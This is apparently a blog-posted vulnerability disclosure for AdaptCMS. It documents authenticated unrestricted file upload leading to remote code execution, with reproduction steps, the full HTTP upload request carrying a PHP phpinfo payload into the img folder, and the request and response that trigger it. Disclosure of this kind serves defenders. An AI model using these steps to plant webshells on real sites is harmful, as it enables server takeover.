Description
- It was noted that the application file upload functionality was vulnerable to unrestricted file uploads resulting in RCE via webshell file upload
Authenticated File Upload to RCE #1:
Steps to Reproduce:
- Login as admin user and visit "System" > "Appearance" > "Themes" > "Default" > "Theme Files" and choose "Add New File"
- Select "Add File". In the "File Contents" add the following payload "<?php phpinfo(); ?>"
- Choose "File Extension" to be "php" and set "Folder Location" to "Images"
- Upon uploading the file it would be available under the "img" directory
// HTTP POST request
POST /adaptcms/admin/themes/asset_add/Default HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
[...]
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][filename]"; filename=""
Content-Type: application/octet-stream
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][content]"
<?php phpinfo(); ?>
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_extension]"
php
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][file_name]"
test
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][folder]"
img/
------geckoformboundary648cea5cd97a776abc03a12296adaf90
Content-Disposition: form-data; name="data[Asset][theme]"
[...]
// HTTP Response
HTTP/1.1 302 Found
Date: Fri, 30 May 2025 16:06:57 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.58.131/adaptcms/admin/themes/edit/Default#assets
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
// HTTP Request triggering the webshell
GET /adaptcms/app/webroot/img/test.php HTTP/1.1
Host: 192.168.58.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
[...]
// HTTP Response triggering the webshell
HTTP/1.1 200 OK
Date: Fri, 30 May 2025 16:15:36 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 102019
[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux debian 6.1.0-32-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.129-1 (2025-03-06) x86_64 </td></tr>
<tr>
[...]
No comments:
Post a Comment